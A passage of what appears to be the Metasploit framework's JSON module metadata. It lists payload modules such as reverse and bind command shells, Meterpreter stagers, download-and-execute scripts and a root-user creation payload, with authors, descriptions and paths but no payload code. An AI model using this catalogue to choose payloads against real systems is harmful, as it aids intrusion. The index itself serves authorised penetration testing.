"disclosure_date": null,
"type": "payload",
"author": [
"Samy <samy@samy.pl>",
"cazz <bmc@shmoo.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "Listen for a connection and spawn a command shell via perl (persistent)",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/payloads/singles/cmd/windows/bind_perl.rb",
"is_install_path": true,
"ref_name": "cmd/windows/bind_perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/bind_perl_ipv6": {
"name": "Windows Command Shell, Bind TCP (via perl) IPv6",
"full_name": "payload/cmd/windows/bind_perl_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Samy <samy@samy.pl>",
"cazz <bmc@shmoo.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "Listen for a connection and spawn a command shell via perl (persistent)",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb",
"is_install_path": true,
"ref_name": "cmd/windows/bind_perl_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/bind_ruby": {
"name": "Windows Command Shell, Bind TCP (via Ruby)",
"full_name": "payload/cmd/windows/bind_ruby",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Continually listen for a connection and spawn a command shell via Ruby",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/bind_ruby.rb",
"is_install_path": true,
"ref_name": "cmd/windows/bind_ruby",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/download_eval_vbs": {
"name": "Windows Executable Download and Evaluate VBS",
"full_name": "payload/cmd/windows/download_eval_vbs",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"scriptjunkie"
],
"description": "Downloads a file from an HTTP(S) URL and executes it as a vbs script.\n Use it to stage a vbs encoded payload from a short command line.",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/download_eval_vbs.rb",
"is_install_path": true,
"ref_name": "cmd/windows/download_eval_vbs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/download_exec_vbs": {
"name": "Windows Executable Download and Execute (via .vbs)",
"full_name": "payload/cmd/windows/download_exec_vbs",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"scriptjunkie"
],
"description": "Download an EXE from an HTTP(S) URL and execute it",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/download_exec_vbs.rb",
"is_install_path": true,
"ref_name": "cmd/windows/download_exec_vbs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/generic": {
"name": "Windows Command, Generic Command Execution",
"full_name": "payload/cmd/windows/generic",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Executes the supplied command",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/generic.rb",
"is_install_path": true,
"ref_name": "cmd/windows/generic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/powershell_bind_tcp": {
"name": "Windows Interactive Powershell Session, Bind TCP",
"full_name": "payload/cmd/windows/powershell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Turner",
"Dave Hardy"
],
"description": "Interacts with a powershell session on an established socket connection",
"references": [
"URL-https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/"
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-26 08:40:07 +0000",
"path": "/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "cmd/windows/powershell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/powershell_reverse_tcp": {
"name": "Windows Interactive Powershell Session, Reverse TCP",
"full_name": "payload/cmd/windows/powershell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Turner",
"Dave Hardy"
],
"description": "Interacts with a powershell session on an established socket connection",
"references": [
"URL-https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/"
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-26 08:40:07 +0000",
"path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "cmd/windows/powershell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/reverse_lua": {
"name": "Windows Command Shell, Reverse TCP (via Lua)",
"full_name": "payload/cmd/windows/reverse_lua",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Creates an interactive shell via Lua",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/reverse_lua.rb",
"is_install_path": true,
"ref_name": "cmd/windows/reverse_lua",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/reverse_perl": {
"name": "Windows Command, Double Reverse TCP Connection (via Perl)",
"full_name": "payload/cmd/windows/reverse_perl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"cazz <bmc@shmoo.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "Creates an interactive shell via perl",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/payloads/singles/cmd/windows/reverse_perl.rb",
"is_install_path": true,
"ref_name": "cmd/windows/reverse_perl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/reverse_powershell": {
"name": "Windows Command Shell, Reverse TCP (via Powershell)",
"full_name": "payload/cmd/windows/reverse_powershell",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Dave Kennedy",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "Connect back and create a command shell via Powershell",
"references": [
"URL-https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell"
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb",
"is_install_path": true,
"ref_name": "cmd/windows/reverse_powershell",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/windows/reverse_ruby": {
"name": "Windows Command Shell, Reverse TCP (via Ruby)",
"full_name": "payload/cmd/windows/reverse_ruby",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Connect back and create a command shell via Ruby",
"references": [
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/cmd/windows/reverse_ruby.rb",
"is_install_path": true,
"ref_name": "cmd/windows/reverse_ruby",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_firefox/exec": {
"name": "Firefox XPCOM Execute Command",
"full_name": "payload/firefox/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module runs a shell command on the target OS without touching the disk.\n On Windows, this command will flash the command prompt momentarily.\n This can be avoided by setting WSCRIPT to true, which drops a jscript\n \"launcher\" to disk that hides the prompt.",
"references": [
],
"platform": "Firefox",
"arch": "firefox",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/payloads/singles/firefox/exec.rb",
"is_install_path": true,
"ref_name": "firefox/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_firefox/shell_bind_tcp": {
"name": "Command Shell, Bind TCP (via Firefox XPCOM script)",
"full_name": "payload/firefox/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Creates an interactive shell via Javascript with access to Firefox's XPCOM API",
"references": [
],
"platform": "Firefox",
"arch": "firefox",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/firefox/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "firefox/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_firefox/shell_reverse_tcp": {
"name": "Command Shell, Reverse TCP (via Firefox XPCOM script)",
"full_name": "payload/firefox/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Creates an interactive shell via Javascript with access to Firefox's XPCOM API",
"references": [
],
"platform": "Firefox",
"arch": "firefox",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/firefox/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "firefox/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_generic/custom": {
"name": "Custom Payload",
"full_name": "payload/generic/custom",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"scriptjunkie <scriptjunkie@scriptjunkie.us>"
],
"description": "Use custom string or file as payload. Set either PAYLOADFILE or\n PAYLOADSTR.",
"references": [
],
"platform": "All",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/generic/custom.rb",
"is_install_path": true,
"ref_name": "generic/custom",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_generic/debug_trap": {
"name": "Generic x86 Debug Trap",
"full_name": "payload/generic/debug_trap",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"robert <robertmetasploit@gmail.com>"
],
"description": "Generate a debug trap in the target process",
"references": [
],
"platform": "BSD,BSDi,Linux,OSX,Solaris,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/generic/debug_trap.rb",
"is_install_path": true,
"ref_name": "generic/debug_trap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_generic/shell_bind_tcp": {
"name": "Generic Command Shell, Bind TCP Inline",
"full_name": "payload/generic/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "All",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/generic/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "generic/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_generic/shell_reverse_tcp": {
"name": "Generic Command Shell, Reverse TCP Inline",
"full_name": "payload/generic/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "All",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/generic/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "generic/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_generic/tight_loop": {
"name": "Generic x86 Tight Loop",
"full_name": "payload/generic/tight_loop",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "Generate a tight loop in the target process",
"references": [
],
"platform": "BSD,BSDi,Linux,OSX,Solaris,Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/generic/tight_loop.rb",
"is_install_path": true,
"ref_name": "generic/tight_loop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/jsp_shell_bind_tcp": {
"name": "Java JSP Command Shell, Bind TCP Inline",
"full_name": "payload/java/jsp_shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux,OSX,Solaris,Unix,Windows",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/java/jsp_shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "java/jsp_shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/jsp_shell_reverse_tcp": {
"name": "Java JSP Command Shell, Reverse TCP Inline",
"full_name": "payload/java/jsp_shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux,OSX,Solaris,Unix,Windows",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "java/jsp_shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/meterpreter/bind_tcp": {
"name": "Java Meterpreter, Java Bind TCP Stager",
"full_name": "payload/java/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Run a meterpreter server in Java. Listen for a connection",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/java/bind_tcp.rb",
"is_install_path": true,
"ref_name": "java/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/meterpreter/reverse_http": {
"name": "Java Meterpreter, Java Reverse HTTP Stager",
"full_name": "payload/java/meterpreter/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Run a meterpreter server in Java. Tunnel communication over HTTP",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/java/reverse_http.rb",
"is_install_path": true,
"ref_name": "java/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/meterpreter/reverse_https": {
"name": "Java Meterpreter, Java Reverse HTTPS Stager",
"full_name": "payload/java/meterpreter/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Run a meterpreter server in Java. Tunnel communication over HTTPS",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/java/reverse_https.rb",
"is_install_path": true,
"ref_name": "java/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/meterpreter/reverse_tcp": {
"name": "Java Meterpreter, Java Reverse TCP Stager",
"full_name": "payload/java/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Run a meterpreter server in Java. Connect back stager",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/java/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "java/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/shell/bind_tcp": {
"name": "Command Shell, Java Bind TCP Stager",
"full_name": "payload/java/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>"
],
"description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/java/bind_tcp.rb",
"is_install_path": true,
"ref_name": "java/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/shell/reverse_tcp": {
"name": "Command Shell, Java Reverse TCP Stager",
"full_name": "payload/java/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>"
],
"description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/java/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "java/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_java/shell_reverse_tcp": {
"name": "Java Command Shell, Reverse TCP Inline",
"full_name": "payload/java/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Java",
"arch": "java",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/java/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "java/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/aarch64/meterpreter/reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Stager",
"full_name": "payload/linux/aarch64/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-29 10:09:38 +0000",
"path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/aarch64/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/aarch64/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/aarch64/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/aarch64/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/aarch64/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/aarch64/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/aarch64/shell/reverse_tcp": {
"name": "Linux dup2 Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/aarch64/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
],
"description": "dup2 socket in x12, then execve. Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-29 10:09:38 +0000",
"path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/aarch64/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/aarch64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-21 14:42:30 +0000",
"path": "/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armbe/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/armbe/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "armbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/armbe/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armbe/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/armbe/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "armbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/armbe/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armbe/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/armbe/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "armbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armbe/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armbe/shell_bind_tcp": {
"name": "Linux ARM Big Endian Command Shell, Bind TCP Inline",
"full_name": "payload/linux/armbe/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "armbe",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armbe/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/adduser": {
"name": "Linux Add User",
"full_name": "payload/linux/armle/adduser",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Jonathan Salwan"
],
"description": "Create a new user with UID 0",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/armle/adduser.rb",
"is_install_path": true,
"ref_name": "linux/armle/adduser",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_linux/armle/exec": {
"name": "Linux Execute Command",
"full_name": "payload/linux/armle/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Jonathan Salwan"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/armle/exec.rb",
"is_install_path": true,
"ref_name": "linux/armle/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/armle/meterpreter/bind_tcp": {
"name": "Linux Meterpreter, Bind TCP Stager",
"full_name": "payload/linux/armle/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
